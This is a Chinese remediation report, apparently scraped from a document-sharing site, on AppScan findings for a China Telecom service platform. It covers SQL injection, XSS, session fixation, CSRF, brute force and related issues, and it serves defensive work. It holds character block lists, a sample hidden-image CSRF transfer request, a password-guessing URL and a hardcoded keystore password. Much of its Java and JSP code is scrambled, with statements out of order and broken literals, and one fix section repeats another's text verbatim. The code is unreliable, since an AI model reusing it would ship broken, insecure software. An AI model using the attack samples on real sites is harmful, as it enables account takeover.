应用程序解决方案.............................................................................................................26 11.1 11.2 11.3 11.4中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结 Web安全介绍目前很多业务都依赖于互联网，例如说网上银行、网络购物、网游等，很多恶意攻击者出于不良的目的对Web 服务器进行攻击，想方设法通过各种手段获取他人的个人账户信息谋取利益。正是因为这样，Web业务平台最容易遭受攻击。同时，对Web服务器的攻击也可以说是形形色色、种类繁多，常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。一方面，由于TCP/IP的设计是没有考虑安全问题的，这使得在网络上传输的数据是没有任何安全防护的。攻击者可以利用系统漏洞造成系统进程缓冲区溢出，攻击者可能获得或者提升自己在有漏洞的系统上的用户权限来运行任意程序，甚至安装和运行恶意代码，窃取机密数据。而应用层面的软件在开发过程中也没有过多考虑到安全的问题，这使得程序本身存在很多漏洞，诸如缓冲区溢出、SQL注入等等流行的应用层攻击，这些均属于在软件研发过程中疏忽了对安全的考虑所致。另一方面，用户对某些隐秘的东西带有强烈的好奇心，一些利用木马或病毒程序进行攻击的攻击者，往往就利用了用户的这种好奇心理，将木马或病毒程序捆绑在一些艳丽的图片、音视频及免费软件等文件中，然后把这些文件置于某些网站当中，再引诱用户去单击或下载运行。或者通过电子邮件附件和QQ、MSN等即时聊天软件，将这些捆绑了木马或病毒的文件发送给用户，利用用户的好奇心理引诱用户打开或运行这些文件、SQL注入、盲注 2.1 SQL注入、盲注概述Web 应用程序通常在后端使用数据库，以与企业数据仓库交互。查询数据库事实上的标准语言是 SQL（各大数据库供应商都有自己的不同版本）。Web 应用程序通常会获取用户输入（取自 HTTP 请求），将它并入 SQL 查询中，然后发送到后端数据库。接着应用程序便处理查询结果，有时会向用户显示结果。如果应用程序对用户（攻击者）的输入处理不够小心，攻击者便可以利用这种操作方式。在此情况下，攻击者可以注入恶意的数据，当该数据并入 SQL 查询中时，就将查询的原始语法更改得面目全非。例如，如果应用程序使用用户的输入（如用户名和密码）来查询用户帐户的数据库表，以认证用户，而攻击者能够将恶意数据注入查询的用户名部分（和/或密码部分），查询便可能更改成中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结完全不同的数据复制查询，可能是修改数据库的查询，或在数据库服务器上运行 Shell 命令的查询。2.2 安全风险及原因高风险漏洞，攻击者可能会查看、修改或删除数据库条目和表原因：未对用户输入正确执行危险字符清理2.3 AppScan扫描建议若干问题的补救方法在于对用户输入进行清理。通过验证用户输入未包含危险字符，便可能防止恶意的用户导致应用程序执行计划外的任务，例如：启动任意 SQL 查询、嵌入将在客户端执行的 Javascript 代码、运行各种操作系统命令，等等。建议过滤出所有以下字符： [1] |（竖线符号）[2] &（& 符号）[3];（分号）[4] $（美元符号）[5] %（百分比符号）[6] @（at 符号）[7] '（单引号）[8] “（引号）[9] '（反斜杠转义单引号）[10] ”（反斜杠转义引号）[11] <>（尖括号）[12]()（括号）[13] +（加号）[14] CR（回车符，ASCII 0x0d）[15] LF（换行，ASCII 0x0a）[16] ,（逗号）[17]（反斜杠）以下部分描述各种问题、问题的修订建议以及可能触发这些问题的危险字符： SQL 注入和 SQL 盲注：A.确保用户输入的值和类型（如 Integer、Date 等）有效，且符合应用程序预期。B.利用存储过程，将数据访问抽象化，让用户不直接访问表或视图。当使用存储过程时，请利用 ADO 命令对象来实施它们，以强化变量类型。C.清理输入以排除上下文更改符号，例如： [1] '（单引号）[2] “（引号）[3] '（反斜线转义单引号）中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结[4] ”（反斜杠转义引号）[5])（结束括号）[6];（分号）跨站点脚本编制：A.清理用户输入，并过滤出 JavaScript 代码。我们建议您过滤下列字符： [1] <>（尖括号）[2] “（引号）[3] '（单引号）[4] %（百分比符号）[5];（分号）[6]()（括号）[7] &（& 符号）[8] +（加号）B.如果要修订 <%00script> 变体，请参阅 MS 文章 821349 C.对于 UTF-7 攻击： [-] 可能的话，建议您施行特定字符集编码（使用 'Content-Type' 头或 <meta> 标记）。HTTP 响应分割：清理用户输入（至少是稍后嵌入在 HTTP 响应中的输入）。请确保输入未包含恶意的字符，例如： [1] CR（回车符，ASCII 0x0d）[2] LF（换行，ASCII 0x0a）远程命令执行：清理输入以排除对执行操作系统命令有意义的符号，例如： [1] |（竖线符号）[2] &（& 符号）[3];（分号）执行 shell 命令：A.绝不将未检查的用户输入传递给 eval()、open()、sysopen()、system()之类的 Perl 命令。B.确保输入未包含恶意的字符，例如： [1] $（美元符号）[2] %（百分比符号）[3] @（at 符号）XPath 注入：清理输入以排除上下文更改符号，例如： [1] '（单引号）[2] ”（引号）等 LDAP 注入：A.使用正面验证。字母数字过滤（A..Z,a..z,0..9）适合大部分 LDAP 查询。B.应该过滤出或进行转义的特殊 LDAP 字符： [1] 在字符串开头的空格或“#”字符 [2] 在字符串结尾的空格字符 [3] ,（逗号）[4] +（加号）[5] “（引号）[6]（反斜杠）[7] <>（尖括号）中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结[8];（分号）[9]()（括号）MX 注入：应该过滤出特殊 MX 字符： [1] CR（回车符，ASCII 0x0d）[2] LF（换行，ASCII 0x0a）记录伪造：应该过滤出特殊记录字符： [1] CR（回车符，ASCII 0x0d）[2] LF（换行，ASCII 0x0a）[3] BS（退格，ASCII 0x08）ORM 注入：A.确保用户输入的值和类型（如 Integer、Date 等）有效，且符合应用程序预期。B.利用存储过程，将数据访问抽象化，让用户不直接访问表或视图。C.使用参数化查询 API D.清理输入以排除上下文更改符号，例如：(*)： [1] '（单引号）[2] ”（引号）[3] '（反斜线转义单引号）[4] “（反斜杠转义引号）[5])（结束括号）[6];（分号）2.4 应用程序解决方案1、我们为了调试方便，在页面上会抛出数据库异常信息，如果入侵工具获取了这些信息，就可以获取系统的一些配置信息，如web系统框架、采用的数据库等，从而找出系统漏洞。所以不要在页面上抛出异常的详细信息，这些信息对客户并没有用，只是方便技术人员调试罢了，处理方法是在异常处理页面把打印异常代码删除即可；2、新建一个过滤器，通过过滤器过滤SQL注入特殊字符，配置成功后，重启服务，用Appsan工具扫描，漏洞得到解决，通过过滤器可以解决SQL注入、跨站点脚本编制及通过框架钓鱼等问题，具体实现方式如下：1、在web.xml文件中配置过滤器<filter-mapping> <filter-name>requestEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-name>InjectFilter</filter-name> <filter> <filter-class>com.sitech.ismp.util.context.InjectFilter</filter-c</filter> lass> 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结2、过滤器过滤代码public class InjectFilter extends IsmpServletFilter {private String failPage = ”/loginout.jsp“;//发生注入时，跳转页面public void doFilter(ServletRequest request,ServletResponse response，FilterChain filterchain)throws IOException, ServletException { //判断是否有注入攻击字符HttpServletRequest req =(HttpServletRequest)request;String inj = injectInput(req);if(!inj.equals(”“)){ request.getRequestDispatcher(failPage).forward(request, return;response);} else { // 传递控制到下一个过滤器filterchain.doFilter(request, response);} } /** * 判断request中是否含有注入攻击字符 * @param request * @return */ public String injectInput(ServletRequest request){Enumeration e = request.getParameterNames();String attributeName;String attributeValues[];String inj = ”“;while(e.hasMoreElements()){ attributeName =(String)e.nextElement();//不对密码信息进行过滤，一般密码中可以包含特殊字符if(attributeName.equals(”userPassword“)||attributeName.equals(”co||attributeName.equals(“password”)||attributeName.equals(“PASSWOR continue;nfirmPassword”)||attributeName.equals(“PASSWORD”)D2“)||attributeName.equals(”valiPassword“)){ 5 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结}attributeValues = request.getParameterValues(attributeName);for(int i = 0;i < attributeValues.length;i++){if(attributeValues[i]==null||attributeValues[i].equals(”“))continue;inj = injectChar(attributeValues[i]);if(!inj.equals(”“)){return inj;}} } return inj;} /** * 判断字符串中是否含有注入攻击字符 * @param str * @return */ public String injectChar(String str){String inj_str = ”“)' * %”;String inj_stra[] = inj_str.split(“ ”);for(int i = 0;i < inj_stra.length;i++){ if(str.indexOf(inj_stra[i])>=0){ return inj_stra[i];} } return “";}} 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结会话标识未更新 3.1 会话标识未更新概述“会话固定”是一种攻击技术，会强制用户的会话标识变成显式值。固定会话标识值的技术有许多种，会随着目标 Web 站点的功能而不同。从利用“跨站点脚本编制”到向 Web 站点密集发出先前生成的 HTTP 请求，都在这些技术范围内。用户的会话标识固定之后，攻击者会等待用户登录，然后利用预定义的会话标识值来假定用户的联机身份。一般而言，对于标识值的会话管理系统有两种类型。第一种类型是“宽容”系统，可让 Web 浏览器指定任何标识。第二种类型是“严格”系统，只接受服务器端生成的值。当使用宽容系统时，不需要联系 Web 站点，便可以维护任何会话标识。在严格系统中，攻击者需要维护“陷阱会话”并且必须定期联系 Web 站点，才能防止闲置超时。对于会话固定，倘若没有活动保护，使用会话来识别已认证的用户的任何 Web 站点都可能受到攻击。使用会话标识的 Web 站点通常都是基于 cookie 的站点，但也会使用 URL 和隐藏的表单字段。不幸的是，基于 cookie 的会话最容易受到攻击。目前已识别的大多数攻击方法都是针对 cookie 的固定。相对于在用户登录 Web 站点之后，再窃取用户的会话标识，会话固定提供的机会多得多。在用户登录之前，攻击的活动部分便已启动。会话固定攻击过程通常由三个步骤组成：1)安装会话攻击者针对目标 Web 站点设下“陷阱会话”，并获取这个会话的标识，攻击者也可以选择攻击中所用的任意会话标识。在某些情况下，必须反复联系 Web 站点，才能维护确定好的陷阱会话值。2)固定会话攻击者将陷阱会话值引进用户的浏览器中，固定用户的会话标识。3)进入会话用户登录目标 Web 站点之后，当使用固定会话标识值时，攻击者便可加以接管。”修改对于这类问题解决方案为在用户进入登录页面时清空session让cookie过期request.getSession(true).invalidate();//清空session Cookie cookie = request.getCookies()[0];//获取cookie cookie.setMaxAge(0);//让cookie过期另外一种方式利用JSP的一些特性，不让登录页面产生Session <% page session=”false” %> 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结3.2 安全风险及原因分析高风险漏洞，可能会窃取或操纵客户会话和 cookie，它们可能用于模仿合法用户，从而使黑客能够以该用户身份查看或变更用户记录以及执行事务原因：Web 应用程序编程或配置不安全3.3 AppScan扫描建议始终生成新的会话，供用户成功认证时登录。防止用户操纵会话标识。请勿接受用户浏览器登录时所提供的会话标识3.4 应用程序解决方案会话标识未更新，Appscan给出的描述是建议用户每次登录时需使用新的会话标识。应用程序实现上就是在登录模块，添加以下代码，即用户登录后，重新生成会话。HttpSession session = request.getSession(false);if(session!=null){ //让cookie过期session.invalidate();Cookie cookie = request.getCookies()[0];//获取cookiecookie.setMaxAge(0);//让cookie过期 } request.getSession(true);//生成新会话经过测试，这段代码只在weblogic和tomcat下才有效，在公司中间件webspeed及jboss6.0下问题都依然存在，但从扫描的结果信息分析看，漏洞已经解决，分析判断应该只是session处理机制不同，AppScan工具仍认为存在漏洞风险。在与电信沟通中我们存在一个经验教训大家一定要吸取，不能过渡迷信流行的自动化测试工具，尤其是对于Appscan这种判断防御行为的复杂软件，仅靠有限的规则设置就当做是web安全的唯一标准这显然不太合理，这种情况一定要与测试方沟通解释。另一方面，对于公司的产品webspeed，也想提点建议，商务项目采用公司的产品为公司节约了不少成本，但是我们产品后续升级维护也必须重视起来，当确认出是webspeed本身问题后，联系vasg相关人员进行协调解决，根本没有非常了解该产品技术人员支持，只是一个刚入职的同事在配合测试。调试了一周时间仍不能解决，最后只能作为一个遗留问题搁置。公司一直在向产品化转变，但是自身的产品维护、升级、管理仍然需要改进。 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结已解密登录请求 4.1 已解密登录请求概述在应用程序测试过程中，检测到将未加密的登录请求发送到服务器。由于登录过程所用的部分输入字段（例如：用户名、密码、电子邮件地址、社会保险号码，等等）是个人敏感信息，建议通过加密连接（如 SSL）将其发送到服务器。任何以明文传给服务器的信息都可能被窃，稍后可用来电子欺骗身份或伪装用户。此外，若干隐私权法规指出，用户凭证之类的敏感信息一律以加密方式传给网站。4.2 安全风险及原因分析安全风险中，可能会窃取诸如用户名和密码等未经加密即发送了的用户登录信息原因：诸如用户名、密码和信用卡号之类的敏感输入字段未经加密即进行了传递4.3 AppScan扫描建议1.确保所有登录请求都以加密方式发送到服务器。2.请确保敏感信息，例如：密码-社会保险号码驾照号码-电子邮件地址邮政编码一律以加密方式传给服务器。4.4 应用程序解决方案已解密的登录请求，要求就是数据要加密传输。最简单有效的解决方式采用SSL加密协议传输，但是由于EMA服务管理平台业务的特殊性，采用SSL加密方式对现有的业务影响太大，所以最终没有采用此种方式解决该问题，但个人在进行测试过程中也尝试在tomcat和jboss下SSL方式配置，写下来供参考。 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结Jboss内核也是tomcat，所以两者配置基本都是一样，都是在生成证书文件后，在service.xml 进行配置：1.进入到cmd 进入到jdk bin目录下执行keytool-genkey-alias tomcat-keyalg RSA-keystore webspeed.keystore 生成证书 2.在service.xml配置SSL <Connector port=”8443“ maxHttpHeaderSize=”8192“ maxThreads=”150“ minSpareThreads=”25“ maxSpareThreads=”75“ enableLookups=”false“ disableUploadTimeout=”true“ acceptCount=”100“ scheme=”https“ secure=”true“ clientAuth=”false“ sslProtocol=”TLS“keystoreFile=”C:tomcat-5.5.26confwebspeed.keystore“ keystorePass=”1111aaaa“/> 这样配置后虽然可以通过https访问，但仍然还可以通过8080使用普通的http访问，所以还必须禁止普通模式登录。所以还得在web.xml添加配置。01 <security-constraint> 02 03  04 05 <web-resource-collection > 06 07 <web-resource-name >SSL</web-resource-name> 08 09 <url-pattern>*.jsp</url-pattern> 10 11 <url-pattern>*.action</url-pattern> 12 13 </web-resource-collection> 14 15 <user-data-constraint> 16 17 <transport-guarantee>CONFIDENTIAL</transport-guarantee> 18 19 </user-data-constraint> 20 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结 </security-constraint> 22 23 <login-config> 24 25  26 27 <auth-method>CLIENT-CERT</auth-method> 28 29 <realm-name>Client Cert Users-only Area</realm-name> 30 31 </login-config> 应注意，由于项目的一些组件无法通过https，因此url-pattern字段只对.jsp和.action进行了限制，如果不做特定限制，则系统默认是全部使用https传输。而且上述设置一旦在某个工程中出现，那么当前tomcat将全局采用这一配置。跨站点请求伪造 5.1 跨站点请求伪造概述“跨站点伪造请求(CSRF)”攻击可让黑客以受害者的名义在易受攻击的站点上运行操作。当易受攻击的站点未适当验证请求来源时，便可能出现这个攻击。这个漏洞的严重性取决于受影响的应用程序的功能，例如，对搜索页面的 CSRF 攻击，严重性低于对转帐页面或概要更新页面的 CSRF 攻击。这项攻击的执行方式，是强迫受害者的浏览器向易受攻击的站点发出 HTTP 请求。如果用户目前已登录受害者站点，请求会自动使用用户的凭证（如会话 Cookie、用户的 IP 地址，以及其他浏览器认证方法）。攻击者利用这个方法来伪造受害者的身份，再代替他来提交操作。换句话来说，易受攻击的站点未采取适当措施来验证用户实际是否想执行特定操作。强迫受害者发送非预期的请求，方法有许多种：-通过电子邮件向受害者发送易受攻击应用程序的恶意链接。在公共论坛中，张贴易受攻击站点的链接。中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结-利用站点（或另一个站点）的“跨站点脚本编制”或“链接注入”漏洞，将浏览器自动重定向到易受攻击的站点。如果攻击者利用易受攻击的站点本身的“链接注入”漏洞，可以增加用户通过站点认证的可能性，进而增加攻击成功的可能性。例如，攻击者可以利用上述任何选项来诱惑受害者查看含有下列条目的页面： <img src=”http://bank/transfer?destination=John&money=1000“ style='visibility:hidden'>这会使受害者的浏览器自动请求 URL 及浏览器的当前凭证。如果这个银行业站点易受到 CSRF 攻击，它会根据应用程序逻辑，从受害者的帐户中，将 1000 美元转账到 John 的银行帐户。“跨站点伪造请求”攻击也称为 CSRF（发音为 C-Serf）、XSRF、“跨站点伪造引用”、“单键攻击”以及“会话骑乘”。您可以利用下列方式来验证您的应用程序是否易受到 CSRF 攻击： [1] 检查易受攻击的链接/请求是否未包括攻击者难以猜中的参数 [2] 检查易受攻击的链接/请求是否会执行只应自愿执行的操作含有用户在不知不觉中提交的请求所能直接访问的敏感操作的应用程序，被视为很容易遭受 CSRF 攻击。CSRF 也可能出现在登录页面和注销页面上。由于攻击者可以伪造来自受害者的连续注销请求，因此 CSRF 可能导致服务拒绝。在登录页面上，CSRF 可以允许攻击者使用包含攻击者用户名和密码的伪造请求来将客户机登录到攻击者的账户中。登录 CSRF 攻击会带有严重的后果，这取决于其他站点行为。例如，如果站点保留了用户操作的历史记录（例如搜索历史记录），那么攻击者将能够在易受攻击的站点上查看受害者之前执行的操作。5.2 安全风险及原因分析安全风险中，可能会窃取或操纵客户会话和 cookie，它们可能用于模仿合法用户，从而使黑客能够以该用户身份查看或变更用户记录以及执行事务原因：应用程序使用的认证方法不充分 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结5.3 AppScan扫描建议如果要避免 CSRF 攻击，每个请求都应该包含唯一标识，它是攻击者所无法猜测的参数。建议的选项之一是添加取自会话 cookie 的会话标识，使它成为一个参数。服务器必须检查这个参数是否符合会话 cookie，若不符合，便废弃请求。攻击者无法猜测这个参数的原因是应用于 cookie 的“同源策略”，因此，攻击者无法伪造一个虚假的请求，让服务器误以为真。攻击者难以猜测且无法访问的任何秘密（也就是无法从其他域访问），都可用来替换会话标识。这可以防止攻击者设计看似有效的请求。5.4 应用程序解决方案已解密的登录请求，要求就是数据要加密传输。最简单有效的解决方式采用SSL加密协议传输，但是由于EMA服务管理平台业务的特殊性，采用SSL加密方式对现有的业务影响太大，所以最终没有采用此种方式解决该问题，但个人在进行测试过程中也尝试在tomcat和jboss下SSL方式配置，写下来供参考。6 不充分账户封锁 6.1 不充分账户封锁概述蛮力攻击是指恶意用户发送大量可能的密码和/或用户名以访问应用程序的尝试。由于该技术包含大量登录尝试，未限制允许的错误登录请求次数的应用程序很容易遭到这类攻击。因此，强烈建议您对帐户限制允许的错误登录尝试次数，超过该次数，便锁定该帐户。样本利用：下列请求说明密码猜测请求：http://site/login.asp?username=EXISTING_USERNAME&password=GUESSED_PASSWORD 如果站点在若干次错误尝试之后并不锁定测试的帐户，攻击者最终可能会发现帐户密码，并使用它来假冒帐户的合法用户。6.2 安全风险及原因分析安全风险高，可能会升级用户特权并通过 Web 应用程序获取管理许可权原因：Web 应用程序编程或配置不安全 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结6.3 AppScan扫描建议请确定允许的登录尝试次数（通常是 3-5 次），确保超出允许的尝试次数之后，便锁定帐户。为了避免真正的用户因帐户被锁定而致电支持人员的麻烦，可以仅临时性暂挂帐户活动，并在特定时间段之后启用帐户。帐户锁定大约 10 分钟，通常便足以阻止蛮力攻击。6.4 应用程序解决方案根据扫描建议，web应用程序设定允许登录尝试次数，登录连续失败超过设定次数，就锁定用户，失败次数灵活配置。在用户登录时进行验证：if(!encrypter.encrypt(userPassword).equalsIgnoreCase({} //更新此用户登录失败次数this.updateLoginFailTimes(userCode);//如果用户连续登录失败次数超过配置值则将其锁定int loginLockTimes=this.getLoginLockTimes();if(this.getLoginFailTimes(userCode)>=loginLockTimes){ } throw new MySecurityException(”密码不正确!用户:“ + userCode);this.lockUser(userCode);user.getLOGIN_PASSWD()== null ? ”“ : user.getLOGIN_PASSWD()))7 启用不安全HTTP方法 7.1 启用不安全HTTP方法概述似乎 Web 服务器配置成允许下列其中一个（或多个）HTTP 方法（动词）：-DELETE COPY PROPFIND LOCK-UNLOCK这些方法可能表示在服务器上启用了 WebDAV，可能允许未授权的用户对其进行利用。7.2 安全风险及原因分析安全风险中，可能会在 Web 服务器上上载、修改或删除 Web 页面、脚本和文件原因：Web 服务器或应用程序服务器是以不安全的方式配置的7.3 AppScan扫描建议如果服务器不需要支持 WebDAV，请务必禁用它，或禁止不必要的 HTTP 方法（动词）。7.4 应用程序解决方案修改web工程中web.xml,增加安全配置信息，禁用不必要HTTP方法<security-constraint><web-resource-collection><web-resource-name>HtmlAdaptor</web-resource-name> <description>test</description> <url-pattern>*.jsp</url-pattern> <url-pattern>*.do</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>HEAD</http-method> <http-method>OPTIONS</http-method> <http-method>TRACE</http-method>中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结</web-resource-collection></security-constraint>。<role-name>JBossAdmin</role-name> HTTP注释敏感信息 8.1 HTTP注释敏感信息概述很多 Web 应用程序程序员使用 HTML 注释，以在需要时帮助调试应用程序。尽管添加常规注释有助于调试应用程序，但一些程序员往往会遗留重要数据（例如：与 Web 应用程序相关的文件名、旧的链接或原非供用户浏览的链接、旧的代码片段等）。8.2 安全风险及原因分析安全风险低，能会收集有关 Web 应用程序的敏感信息，如用户名、密码、机器名和/或敏感文件位置原因：程序员在 Web 页面上留下调试信息8.3 AppScan扫描建议[1] 请勿在 HTML 注释中遗留任何重要信息（如文件名或文件路径）。[2] 从生产站点注释中除去以前（或未来）站点链接的跟踪信息。[3] 避免在 HTML 注释中放置敏感信息。[4] 确保 HTML 注释不包括源代码片段。[5] 确保程序员没有遗留重要信息。 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结8.4 应用程序解决方案虽然这个漏洞为低级别漏洞，但电信方也是要求必须修复，要修改此漏洞需要检查工程中的每一个jsp页面，工作量还是挺大。所以在后续开发过程中注释尽量写英文注释，尽量不要遗留敏感注释信息在jsp代码中，养成良好的编码习惯才是解决问题根本。发现电子邮件地址模式9.1 发现电子邮件地址模式概述Spambot 搜寻因特网站点，开始查找电子邮件地址来构建发送自发电子邮件（垃圾邮件）的邮件列表。AppScan 检测到含有一或多个电子邮件地址的响应，可供利用以发送垃圾邮件。而且，找到的电子邮件地址也可能是专用电子邮件地址，对于一般大众应是不可访问的。9.2 安全风险及原因分析安全风险低，能会收集有关 Web 应用程序的敏感信息，如用户名、密码、机器名和/或敏感文件位置原因：Web 应用程序编程或配置不安全9.3 AppScan扫描建议从 Web 站点中除去任何电子邮件地址，使恶意的用户无从利用。9.4 应用程序解决方案根据扫描建议删除注释中出现email地址信息，如果页面中要显示mail地址转为图片形式展示。如：ema服务管理平台首页需要展示客户联系方式，并且联系方式、email等信息，这些信息用户都是可以自行修改的，因为包含了email地址，所以联系方式就转为图片形式：<%@ page language=”java“ contentType=”text/html;charset=gb2312“%> <%@ include file=”/common/taglib.jsp“ %> <%@ include file=”/common/chart.jsp“ %> <%@ page import=”java.util.List,java.util.*,java.awt.*,java.awt.image.*,com.su 17 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结n.image.codec.jpeg.*,java.util.*“ %> <%@ page import=”com.sitech.ismp.informationService.publish.dao.TB_SYS_SUPPORT_STAFFDao“ %> <html:html locale=”true“> <head> <%@ include file=”/common/link.jsp“ %> <%@ page import=”com.sitech.ismp.util.context.CommUtil“ %> </head> <link href=”/css/style.css“ rel=”stylesheet“ type=”text/css“> <script type=”text/javascript“ src=”/js/pub.js“></script> <link rel=”stylesheet“ type=”text/css“ media=”all“ href=”/css/calendar-win2k-cold-1.css“ title=”win2k-cold-1“ /> <body> <html:form action=”/homeContactShow“ method=”post“ styleId=”theForm“> <bean:define id=”theForm“ name=”supportStaffForm“/> <DIV class=bg id=left> <div> <table width=”100%“ border=”0“ cellpadding=”0“ cellspacing=”0“ class=”tablebg“> <TBODY> <tr> <td class=”tableheadbg“>运营中心联系方式</td> </tr> <tr> <td class=”tablewhitebg“><%List typeList =(List)request.getAttribute(”typeList“);out.clear();out = pageContext.pushBody();response.addHeader(”pragma“,”NO-cache“);response.addHeader(”Cache-Control“,”no-cache“);response.addDateHeader(”Expries“,0);int rowheight=20;int width=135,height=rowheight*typeList.size();String ty= ”“;String mob=”“;for(int i=0;i<typeList.size();i++){HashMap hm=(HashMap)typeList.get(i);ty=(String)hm.get(”TYPE_ID“);List sta =(List)dao.findSupportStaffByTypeId(ty);for(int k=0;k<sta.size();k++){TB_SYS_SUPPORT_STAFFDao dao= new TB_SYS_SUPPORT_STAFFDao();response.setContentType(”image/jpeg“); 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结HashMap map =(HashMap)sta.get(k);mob =(String)map.get(”MOBILE“);height+=3*rowheight;if(mob!=null)height+=rowheight;}}BufferedImage image = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);Graphics g = image.getGraphics();g.setColor(Color.white);g.fillRect(0, 0, width, height);g.setColor(Color.BLUE);Font font=new Font(”宋体“,Font.PLAIN,13);g.setFont(font);int row=0;String typeid = ”“;String typename=”“;String name = ”“;String tel=”“;String mail = ”“;String mobile=”“;for(int i=0;i<typeList.size();i++){HashMap hm=(HashMap)typeList.get(i);typeid=(String)hm.get(”TYPE_ID“);typename=(String)hm.get(”TYPE_NAME“);row++;g.drawString(typename,0,(row-1)*rowheight+10);List staffs =(List)dao.findSupportStaffByTypeId(typeid);for(int k=0;k<staffs.size();k++){HashMap map =(HashMap)staffs.get(k);name =(String)map.get(”NAME“);tel =(String)map.get(”TEL“);mail =(String)map.get(”MAIL“);mobile =(String)map.get(”MOBILE“);row++;g.drawString(name+”:"+tel,0,(row-1)*rowheight+10);row++;g.drawString(mail,0,(row-1)*rowheight+10);if(mobile!=null){row++;g.drawString(mail,0,(row-1)*rowheight+10);} 19 中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结} } g.dispose();ServletOutputStream outStream = response.getOutputStream();JPEGImageEncoder encoder encoder.encode(image);outStream.close();=JPEGCodec.createJPEGEncoder(outStream);%> </td> </tr></TBODY> </table> </div> </article> <a href="#" tpid="25" target="_self" class="download_card jhcdown" rel="nofollow"> <img class="download_card_pic" src="//static.xiexiebang.com/skin/default/images/icon_word.png" alt="下载ewebeditor漏洞利用总结word格式文档"> <div class="download_card_msg"> <div class="download_card_title" style="text-decoration:none;">下载ewebeditor漏洞利用总结.doc</div> <div class="download_card_tip">将本文档下载到自己电脑，方便修改和收藏，请勿使用迅雷等下载。</div> </div> <div class="download_card_btn"> <img src="//static.xiexiebang.com/skin/default/images/icon_download.png"> <div class="downlod_btn_right"> <div>点此处下载文档</div> 文档为doc格式 </div> </div> </a> <div class="post-tags mt20 mb30">相关专题 <a href="/tag/ewebeditorwqzj/" target="_blank">ewebeditor完全总结</a> </div> <div class="single-info mb40">网址：https://www.xiexiebang.com/a8/201905139/5299be55f372ba7f.html 声明：本文内容由互联网用户自发贡献自行上传，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任。如果您发现有涉嫌版权的内容，欢迎发送邮件至：645879355@qq.com 进行举报，并提供相关证据，工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。 </div> <div class="single-xg mb40"> <div class="con-title"> <h3><a name="6"></a>相关范文推荐</h3> </div> <div class="sticky mb20"> <ul><h2 class="mb20"><a href="/a14/201905152/f0dcc59e96450502.html" target="_blank">工作上的漏洞</a></h2>一、工作上的漏洞（一）具体体现： 1、学习不够，没有把科学发展观理论与学校教育教学紧密结合。在运用科学发展理论来指导教育教学时，眼光过度关注学校发展，忽视了科学发展理论对......<h2 class="mb20"><a href="/a14/2019051422/575531ef31580d8a.html" target="_blank">漏洞排查情况报告（★）</a></h2>县农村信用合作联社科技信息部内部控制缺陷和漏洞梳理排查情况进展报告风险合规部：《关于印发县农村信用合作联社内部控制缺陷和漏洞梳理排查工作实施细则的通知》（农信发﹝2......<h2 class="mb20"><a href="/a8/2019051317/52ca3748c7b31c41.html" target="_blank">内控漏洞案例</a></h2>不相容职务不分离案例案例一 2004年10月19号，北京市中级人民法院开庭审理原国家自然科学基金委员会资金管理处会计卞中涉嫌贪污挪用公款2.2亿元的巨额资金一案，卞中被判死缓。......<h2 class="mb20"><a href="/a8/2019051513/a8e83a22d7bdee5c.html" target="_blank">资源利用总结</a></h2>资源综合利用情况总结我公司自2012年3月通过资源综合利用企业再认定以来，紧紧抓住城市综合建设、小城镇新规划快速发展对水泥需求较大有利机遇，把资源综合利用工作作为生产经......<h2 class="mb20"><a href="/a2/2019051218/a0c34487cbeee142.html" target="_blank">开展“查管理,堵漏洞”活动总结</a></h2>开展“查管理，堵漏洞”活动总结 4月10日，我们收听了国家电力公司关于开展“求真务实、作风建设年”活动的电视电话会议，这个会议体现了国电公司领导对作风建设的高度重视。会后......<h2 class="mb20"><a href="/fanwen/zhenggai/7e2d39bdb8a54343.html" target="_blank">网站漏洞整改报告</a></h2>网站安全整改报告收到教育局中心机房发来的网站安全漏洞检测报告，对被检测的域名地址进行确认，我校主要近阶段处在新旧网站交替时期，旧网站还没有退役，新网站也已上线。被检测......<h2 class="mb20"><a href="/a11/2019051416/289551f9623cb0dc.html" target="_blank">漏洞整改报告IDC-ISP</a></h2>漏洞整改报告 1. 漏洞信息 Apache Struts2远程命令执行漏洞，可以远程执行命令，获取敏感信息。 2. 漏洞原因分析 Apache Struts2 版本较低，不是最新版本； 3. 漏洞处理过程升......<h2 class="mb20"><a href="/a11/2019051416/eb923171beb3db53.html" target="_blank">超市收银漏洞如何监管</a></h2>超市收银漏洞如何监管收银漏洞说白了就是收银员有这样那样的损公肥私（包括家人）行为，将本不属于自己的钱据为己有，超市方却又无法做到真正的控制。收银漏洞这样的行为放任下去，......</ul> </div> </div> </div> </div> <div class="right-content-box wow fadeInRight delay300 right-content"> <script src="/e/member/login/loginjs.php"></script> <div class="sidebar"> <div id="sidebar" role="complementary"> <aside id="recent-posts-3" class="widget widget_recent_entries"> <h3 class="widget-title">猜你喜欢</h3> <ul class="new-list"><li><a href="/a13/2019051423/51eb67686e65520c.html" title="信访制度的漏洞" target="_blank">信访制度的漏洞</a></li><li><a href="/a10/2019051322/9a5064d3f3f3a5df.html" title="杭州酒店财务管理漏洞" target="_blank">杭州酒店财务管理漏洞</a></li><li><a href="/a14/201905151/821a6ff447138ee9.html" title="如何改进现行财务漏洞" 